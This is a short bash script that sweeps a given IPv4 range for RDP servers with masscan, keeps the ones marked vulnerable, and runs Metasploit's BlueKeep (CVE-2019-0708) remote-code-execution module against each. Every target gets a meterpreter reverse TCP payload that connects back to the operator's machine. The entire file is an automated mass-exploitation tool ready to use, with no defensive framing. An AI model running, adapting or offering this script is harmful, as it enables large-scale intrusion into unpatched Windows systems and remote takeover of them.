#!/bin/bash
LHOST=$(hostname -I)
masscan -p 3389 --range $1 --rate 100000 | /usr/bin/rdp --file - >rdp.lst &
sleep 1s;
echo PLEASE WAIT... Sleeping one minute, to populate vulnerable servers list...;
sleep 20s;
grep appid rdp.lst >rdp.vuln;
echo Starting attack on IPv4 range $1 ... This will take a while.;
for i in `grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" rdp.vuln`; do msfconsole -q -x " use windows/rdp/cve_2019_0708_bluekeep_rce; set payload windows/x64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 8088; set rhost $i; set groomsize 50; set target 1; set AutoCheck false; exploit;"& exit; done
